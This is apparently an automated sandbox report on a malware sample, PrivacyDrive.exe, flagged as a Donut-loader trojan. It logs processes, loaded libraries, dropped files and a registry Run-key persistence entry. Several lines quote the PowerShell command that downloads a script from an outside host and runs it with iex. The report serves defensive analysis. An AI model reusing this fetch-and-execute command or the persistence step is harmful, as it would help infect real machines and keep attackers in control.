Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059D17C0	16_2_059D17C0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059F66E0	16_2_059F66E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059DF193	16_2_059DF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059CC080	16_2_059CC080
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059CB0E0	16_2_059CB0E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C2006	16_2_059C2006
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059F8040	16_2_059F8040
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_05A083B0	16_2_05A083B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C1359	16_2_059C1359
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C12B3	16_2_059C12B3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059FE2A0	16_2_059FE2A0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059F7D90	16_2_059F7D90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059EBC50	16_2_059EBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059E9F99	16_2_059E9F99
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C7EB0	16_2_059C7EB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059CCE00	16_2_059CCE00
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059F6970	16_2_059F6970
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C3890	16_2_059C3890
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_05A0A8B0	16_2_05A0A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059C8850	16_2_059C8850
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_059CAA00	16_2_059CAA00

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 059CEE60 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 059CCBE0 appears 95 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 047D0862 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: String function: 047CE5E2 appears 90 times

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1188

Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.evad.win@31/120@23/13

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 16_2_047C0C6F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

16_2_047C0C6F

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 16_2_059FF006 CoCreateInstance,

16_2_059FF006

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4252

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pddfsfas.1ok.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,8122544170802490295,15874759390953772630,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://google.com"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1188
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1736
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,8122544170802490295,15874759390953772630,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr
Source:	Binary string: _.nDb=_.J("VOy8xe");_.oDb=_.J("s2IYHc");_.pDb=_.J("ucVTnf");_.qDb=_.J("pU3PWb"); source: chromecache_242.1.dr, chromecache_193.1.dr
Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr
Source:	Binary string: _.KDb=function(){var a=_.Jv;if(a.ka!==null)return a.ka;if(document.body){var b=_.Ql.N7(document.body).top;return a.ka=b}return 0};_.Jv=new _.Iv;_.Kv=function(a){_.Jv.WZa(a)};_.LDb=function(){return _.Jv.getScrollTop()};_.Lv=function(a,b){_.Jv.fixedUiScrollTo(a,b)};NDb=navigator.userAgent.match(/ GSA\/([.\d]+)/);MDb=NDb?NDb[1]:"";_.ODb=_.Vb&&_.pa(MDb,"4")>=0;_.PDb=_.Vb&&_.pa(MDb,"5.2")>=0;_.QDb=_.Vb&&_.pa(MDb,"4.3")>=0&&!(_.pa(MDb,"4.5")>=0); source: chromecache_242.1.dr, chromecache_193.1.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text			Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_04802307 push ecx; retf		16_2_04802308
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_05A00905 push ecx; retf		16_2_05A00906

Persistence and Installation Behavior

Powershell uses Background Intelligent Transfer Service (BITS)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: \KnownDlls\BitsProxy.dll

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
